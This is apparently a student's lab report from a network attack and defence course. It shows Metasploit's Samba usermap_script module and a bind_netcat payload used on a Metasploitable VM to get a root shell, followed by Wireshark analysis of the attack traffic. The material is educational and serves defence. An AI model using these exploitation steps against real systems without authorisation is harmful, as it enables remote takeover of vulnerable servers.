20242816 2024-2025-2 《网络攻防实践》第7次作业

20242816 2024-2025-2 《网络攻防实践》第7次作业

1 实践内容

任务一:使用Metasploit进行Linux远程渗透攻击

任务流程细节:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。

任务二:攻防对抗实践

任务详细流程:
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

基础知识

SMB:

SMB(Server Message Block)协议是一种网络文件共享协议,主要用于局域网中计算机之间的文件、打印机和端口资源共享。它允许客户端访问服务器上的文件系统,就像访问本地文件一样。SMB 最早由 IBM 提出,后被微软广泛采用,目前常见版本包括 SMB1.0、SMB2.0 和 SMB3.0。它工作在应用层和会话层之间,使用 TCP 445 端口。由于 SMB 的广泛使用,也曾被利用于多起安全攻击事件,如著名的“永恒之蓝”漏洞(EternalBlue)就利用了 SMB 协议的安全缺陷。

Samba:

Samba 是一个在类 Unix 系统(如 Linux)上实现 SMB 协议的开源服务,它允许这些系统与 Windows 设备进行文件和打印机共享。通过 Samba,Linux 主机可以像 Windows 服务器一样提供共享目录,供局域网内的 Windows 客户端访问,也可以访问 Windows 共享资源,实现跨平台互通。Samba 常用于企业局域网中文件服务器的搭建,支持用户认证、权限控制等功能,是实现 Linux 与 Windows 网络资源共享的重要桥梁。

2 实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

2.1.1 查看攻击机kali和靶机metasploitable的ip地址,并检查连通性,确保kali和metasploitable在同一子网网段



2.1.2 输入msfconsole,启动Metasploit软件

2.1.3 输入search samba,查找要使用的漏洞对应的模块

2.1.4 输入search usermap_script

2.1.5 输入use exploit/mulit/samba/usermap_script攻击目标metasploitable靶机上的Samba服务Usermap_script安全漏洞

2.1.6 输入show payloads,查看与该渗透攻击模块相兼容的攻击载荷

2.1.7 输入set payload cmd/unix/bind_netcat设置攻击载荷为bind_netcat

2.1.8 输入show options,查看需要配置参数

2.1.9 输入set RHOST 192.168.200.126,设置靶机ip,输入set LHOST 192.168.200.2,设置攻击机ip

2.1.10 输入exploit开始攻击,并输入ifconfig查看是否攻击成功

2.2 攻防对抗实践

2.2.1 攻击方:20242816屠桢昊,ip:172.20.10.2

2.2.2 防守方:20241917李柏衡,ip:172.20.10.3

2.2.3 与上一个实验步骤相类似,进行攻击,LHOST设置为靶机ip地址172.20.10.3,LHOST设置为攻击机ip地址172.20.10.2

2.2.4 分别输入shell和id查看shell权限账户及其所在的权限组

2.2.5 输入指令whoami查看当前权限账户,发现是root权限

2.2.6 打开wireshark对刚刚的数据包进行分析,得到攻击方式为smb,攻击端口号是139

2.2.7 追踪第一个数据流可以看到攻击机利用4444端口与靶机建立telnet服务

2.2.7 追踪攻击的tcp流可以看到攻击机所输入的指令,获取的权限

3 实验中遇到的问题及解决

问题:kali主机在桥接模式下一直连接不到网络

解决:在虚拟网络编辑器中绑定网卡得到解决

4 学习与感悟

本次实验与上次实验相类似上次实验是基于windows系统而这一次是基于Linux系统,复习了Metasploit的使用和使用Wireshark等工具进行流量分析,让我意识到网络安全的重要性,我们要加强防火墙的应用、及时使用漏洞补丁,同时也要保护我们主机的安全,让我更深刻意识到网络安全的重要性。

5 参考资料

https://bbs.csdn.net/topics/618558762?spm=1001.2014.3001.6377

posted @ 2025-04-13 11:06  N0rmally  阅读(29)  评论(0)    收藏  举报